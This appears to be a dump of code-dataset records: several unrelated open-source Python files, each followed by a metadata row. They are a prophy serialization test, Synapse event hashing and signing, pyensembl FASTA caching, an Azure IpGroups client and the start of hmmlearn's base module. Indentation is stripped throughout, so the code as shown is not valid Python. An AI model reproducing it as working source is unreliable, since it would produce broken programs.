x.c = 3
x.d = 4
assert b'\x01'b'\x02\x00'b'\x03\x00\x00\x00\x00\x00\x00\x00'b'\x04' == x.encode('<')
x.decode(b'\x04'b'\x05\x00'b'\x06\x00\x00\x00\x00\x00\x00\x00'b'\x07', '<')
assert x.a == 4
assert x.b == 5
assert x.c == 6
assert x.d == 7
def test_struct_with_substruct_with_bytes():
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("num_of_x", prophy.u32),
("x", prophy.array(prophy.u8, bound = "num_of_x"))]
class B(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("num_of_x", prophy.u32),
("x", prophy.array(A, bound = "num_of_x"))]
x = B()
x.x.add().x[:] = [1]
x.x.add().x[:] = [1, 2, 3]
x.x.add().x[:] = [1, 2, 3, 4, 5, 6, 7]
assert (b'\x03\x00\x00\x00'
b'\x01\x00\x00\x00\x01\x00\x00\x00'
b'\x03\x00\x00\x00\x01\x02\x03\x00'
b'\x07\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x00') == x.encode('<')
x.decode((b'\x02\x00\x00\x00'
b'\x01\x00\x00\x00\x06\x00\x00\x00'
b'\x07\x00\x00\x00\x07\x08\x09\x0a\x0b\x0c\x0d\x00'), '<')
assert x.x[0].x[:] == [6]
assert x.x[1].x[:] == [7, 8, 9, 10, 11, 12, 13]
class C(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x", A)]
x = C()
x.x.x[:] = [1]
assert b'\x01\x00\x00\x00\x01\x00\x00\x00' == x.encode('<')
| mit | 5,285,814,586,476,552,000 | 29.348457 | 136 | 0.454698 | false |
matrix-org/synapse | synapse/crypto/event_signing.py | 1 | 6136 | #
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import hashlib
import logging
from typing import Any, Callable, Dict, Tuple
from canonicaljson import encode_canonical_json
from signedjson.sign import sign_json
from signedjson.types import SigningKey
from unpaddedbase64 import decode_base64, encode_base64
from synapse.api.errors import Codes, SynapseError
from synapse.api.room_versions import RoomVersion
from synapse.events import EventBase
from synapse.events.utils import prune_event, prune_event_dict
from synapse.types import JsonDict
logger = logging.getLogger(__name__)
Hasher = Callable[[bytes], "hashlib._Hash"]
def check_event_content_hash(
event: EventBase, hash_algorithm: Hasher = hashlib.sha256
) -> bool:
"""Check whether the hash for this PDU matches the contents"""
name, expected_hash = compute_content_hash(event.get_pdu_json(), hash_algorithm)
logger.debug(
"Verifying content hash on %s (expecting: %s)",
event.event_id,
encode_base64(expected_hash),
)
# some malformed events lack a 'hashes'. Protect against it being missing
# or a weird type by basically treating it the same as an unhashed event.
hashes = event.get("hashes")
# nb it might be a frozendict or a dict
if not isinstance(hashes, collections.abc.Mapping):
raise SynapseError(
400, "Malformed 'hashes': %s" % (type(hashes),), Codes.UNAUTHORIZED
)
if name not in hashes:
raise SynapseError(
400,
"Algorithm %s not in hashes %s" % (name, list(hashes)),
Codes.UNAUTHORIZED,
)
message_hash_base64 = hashes[name]
try:
message_hash_bytes = decode_base64(message_hash_base64)
except Exception:
raise SynapseError(
400, "Invalid base64: %s" % (message_hash_base64,), Codes.UNAUTHORIZED
)
return message_hash_bytes == expected_hash
def compute_content_hash(
event_dict: Dict[str, Any], hash_algorithm: Hasher
) -> Tuple[str, bytes]:
"""Compute the content hash of an event, which is the hash of the
unredacted event.
Args:
event_dict: The unredacted event as a dict
hash_algorithm: A hasher from `hashlib`, e.g. hashlib.sha256, to use
to hash the event
Returns:
A tuple of the name of hash and the hash as raw bytes.
"""
event_dict = dict(event_dict)
event_dict.pop("age_ts", None)
event_dict.pop("unsigned", None)
event_dict.pop("signatures", None)
event_dict.pop("hashes", None)
event_dict.pop("outlier", None)
event_dict.pop("destinations", None)
event_json_bytes = encode_canonical_json(event_dict)
hashed = hash_algorithm(event_json_bytes)
return hashed.name, hashed.digest()
def compute_event_reference_hash(
event, hash_algorithm: Hasher = hashlib.sha256
) -> Tuple[str, bytes]:
"""Computes the event reference hash. This is the hash of the redacted
event.
Args:
event
hash_algorithm: A hasher from `hashlib`, e.g. hashlib.sha256, to use
to hash the event
Returns:
A tuple of the name of hash and the hash as raw bytes.
"""
tmp_event = prune_event(event)
event_dict = tmp_event.get_pdu_json()
event_dict.pop("signatures", None)
event_dict.pop("age_ts", None)
event_dict.pop("unsigned", None)
event_json_bytes = encode_canonical_json(event_dict)
hashed = hash_algorithm(event_json_bytes)
return hashed.name, hashed.digest()
def compute_event_signature(
room_version: RoomVersion,
event_dict: JsonDict,
signature_name: str,
signing_key: SigningKey,
) -> Dict[str, Dict[str, str]]:
"""Compute the signature of the event for the given name and key.
Args:
room_version: the version of the room that this event is in.
(the room version determines the redaction algorithm and hence the
json to be signed)
event_dict: The event as a dict
signature_name: The name of the entity signing the event
(typically the server's hostname).
signing_key: The key to sign with
Returns:
a dictionary in the same format of an event's signatures field.
"""
redact_json = prune_event_dict(room_version, event_dict)
redact_json.pop("age_ts", None)
redact_json.pop("unsigned", None)
if logger.isEnabledFor(logging.DEBUG):
logger.debug("Signing event: %s", encode_canonical_json(redact_json))
redact_json = sign_json(redact_json, signature_name, signing_key)
if logger.isEnabledFor(logging.DEBUG):
logger.debug("Signed event: %s", encode_canonical_json(redact_json))
return redact_json["signatures"]
def add_hashes_and_signatures(
room_version: RoomVersion,
event_dict: JsonDict,
signature_name: str,
signing_key: SigningKey,
) -> None:
"""Add content hash and sign the event
Args:
room_version: the version of the room this event is in
event_dict: The event to add hashes to and sign
signature_name: The name of the entity signing the event
(typically the server's hostname).
signing_key: The key to sign with
"""
name, digest = compute_content_hash(event_dict, hash_algorithm=hashlib.sha256)
event_dict.setdefault("hashes", {})[name] = encode_base64(digest)
event_dict["signatures"] = compute_event_signature(
room_version, event_dict, signature_name=signature_name, signing_key=signing_key
)
| apache-2.0 | -8,759,924,720,279,790,000 | 32.530055 | 88 | 0.679596 | false |
hammerlab/pyensembl | pyensembl/sequence_data.py | 1 | 5420 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division, absolute_import
from os import remove
from os.path import exists, abspath, split, join
import logging
from collections import Counter
from six.moves import cPickle as pickle
from six import string_types
from .common import (load_pickle, dump_pickle)
from .fasta import parse_fasta_dictionary
logger = logging.getLogger(__name__)
class SequenceData(object):
"""
Container for reference nucleotide and amino acid sequenes.
"""
def __init__(
self,
fasta_paths,
cache_directory_path=None):
if isinstance(fasta_paths, string_types):
fasta_paths = [fasta_paths]
self.fasta_paths = [abspath(path) for path in fasta_paths]
self.fasta_directory_paths = [split(path)[0] for path in self.fasta_paths]
self.fasta_filenames = [split(path)[1] for path in self.fasta_paths]
if cache_directory_path:
self.cache_directory_paths = [cache_directory_path] * len(self.fasta_paths)
else:
self.cache_directory_paths = self.fasta_directory_paths
for path in self.fasta_paths:
if not exists(path):
raise ValueError("Couldn't find FASTA file %s" % (path,))
self.fasta_dictionary_filenames = [
filename + ".pickle" for filename in self.fasta_filenames]
self.fasta_dictionary_pickle_paths = [
join(cache_path, filename) for cache_path, filename in
zip(self.cache_directory_paths, self.fasta_dictionary_filenames)]
self._init_lazy_fields()
def _init_lazy_fields(self):
self._fasta_dictionary = None
self._fasta_keys = None
def clear_cache(self):
self._init_lazy_fields()
for path in self.fasta_dictionary_pickle_paths:
if exists(path):
remove(path)
def __str__(self):
return "SequenceData(fasta_paths=%s)" % (self.fasta_paths,)
def __repr__(self):
return str(self)
def __contains__(self, sequence_id):
if self._fasta_keys is None:
self._fasta_keys = set(self.fasta_dictionary.keys())
return sequence_id in self._fasta_keys
def __eq__(self, other):
# test to see if self.fasta_paths and other.fasta_paths contain
# the same list of paths, regardless of order
return (
(other.__class__ is SequenceData) and
Counter(self.fasta_paths) == Counter(other.fasta_paths))
def __hash__(self):
return hash(self.fasta_paths)
def _add_to_fasta_dictionary(self, fasta_dictionary_tmp):
for identifier, sequence in fasta_dictionary_tmp.items():
if identifier in self._fasta_dictionary:
logger.warn(
"Sequence identifier %s is duplicated in your FASTA files!" % identifier)
continue
self._fasta_dictionary[identifier] = sequence
def _load_or_create_fasta_dictionary_pickle(self):
self._fasta_dictionary = dict()
for fasta_path, pickle_path in zip(self.fasta_paths, self.fasta_dictionary_pickle_paths):
if exists(pickle_path):
# try loading the cached file
# but we'll fall back on recreating it if loading fails
try:
fasta_dictionary_tmp = load_pickle(
pickle_path)
self._add_to_fasta_dictionary(fasta_dictionary_tmp)
logger.info(
"Loaded sequence dictionary from %s", pickle_path)
continue
except (pickle.UnpicklingError, AttributeError):
# catch either an UnpicklingError or an AttributeError
# resulting from pickled objects refering to classes
# that no longer exists
logger.warn(
"Failed to load %s, attempting to read FASTA directly",
pickle_path)
logger.info("Parsing sequences from FASTA file at %s", fasta_path)
fasta_dictionary_tmp = parse_fasta_dictionary(fasta_path)
self._add_to_fasta_dictionary(fasta_dictionary_tmp)
logger.info("Saving sequence dictionary to %s", pickle_path)
dump_pickle(fasta_dictionary_tmp, pickle_path)
def index(self, overwrite=False):
if overwrite:
self.clear_cache()
self._load_or_create_fasta_dictionary_pickle()
@property
def fasta_dictionary(self):
if not self._fasta_dictionary:
self._load_or_create_fasta_dictionary_pickle()
return self._fasta_dictionary
def get(self, sequence_id):
"""Get sequence associated with given ID or return None if missing"""
return self.fasta_dictionary.get(sequence_id)
| apache-2.0 | -3,712,856,413,055,222,300 | 38.275362 | 97 | 0.621402 | false |
Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_12_01/aio/operations/_ip_groups_operations.py | 1 | 27195 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class IpGroupsOperations:
"""IpGroupsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
ip_groups_name: str,
expand: Optional[str] = None,
**kwargs
) -> "_models.IpGroup":
"""Gets the specified ipGroups.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:param expand: Expands resourceIds (of Firewalls/Network Security Groups etc.) back referenced
by the IpGroups resource.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IpGroup, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_12_01.models.IpGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
ip_groups_name: str,
parameters: "_models.IpGroup",
**kwargs
) -> "_models.IpGroup":
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'IpGroup')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('IpGroup', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
ip_groups_name: str,
parameters: "_models.IpGroup",
**kwargs
) -> AsyncLROPoller["_models.IpGroup"]:
"""Creates or updates an ipGroups in a specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:param parameters: Parameters supplied to the create or update IpGroups operation.
:type parameters: ~azure.mgmt.network.v2019_12_01.models.IpGroup
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either IpGroup or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_12_01.models.IpGroup]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
ip_groups_name=ip_groups_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
async def update_groups(
self,
resource_group_name: str,
ip_groups_name: str,
parameters: "_models.TagsObject",
**kwargs
) -> "_models.IpGroup":
"""Updates tags of an IpGroups resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:param parameters: Parameters supplied to the update ipGroups operation.
:type parameters: ~azure.mgmt.network.v2019_12_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IpGroup, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_12_01.models.IpGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_groups.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_groups.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
ip_groups_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
ip_groups_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes the specified ipGroups.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
ip_groups_name=ip_groups_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.IpGroupListResult"]:
"""Gets all IpGroups in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either IpGroupListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_12_01.models.IpGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('IpGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups'} # type: ignore
def list(
self,
**kwargs
) -> AsyncIterable["_models.IpGroupListResult"]:
"""Gets all IpGroups in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either IpGroupListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_12_01.models.IpGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('IpGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/ipGroups'} # type: ignore
| mit | -2,391,779,252,557,074,000 | 48.266304 | 186 | 0.639272 | false |
aubreyli/hmmlearn | hmmlearn/base.py | 1 | 23398 | from __future__ import print_function
import string
import sys
from collections import deque
import numpy as np
from scipy.misc import logsumexp
from sklearn.base import BaseEstimator, _pprint
from sklearn.utils import check_array, check_random_state
from sklearn.utils.validation import check_is_fitted
from . import _hmmc
from .utils import normalize, log_normalize, iter_from_X_lengths, log_mask_zero
#: Supported decoder algorithms.
DECODER_ALGORITHMS = frozenset(("viterbi", "map"))
class ConvergenceMonitor(object):
"""Monitors and reports convergence to :data:`sys.stderr`.
Parameters
----------
tol : double
Convergence threshold. EM has converged either if the maximum
number of iterations is reached or the log probability
improvement between the two consecutive iterations is less
than threshold.
n_iter : int
Maximum number of iterations to perform.
verbose : bool
If ``True`` then per-iteration convergence reports are printed,
otherwise the monitor is mute.
Attributes
----------
history : deque
The log probability of the data for the last two training
iterations. If the values are not strictly increasing, the
model did not converge.
iter : int
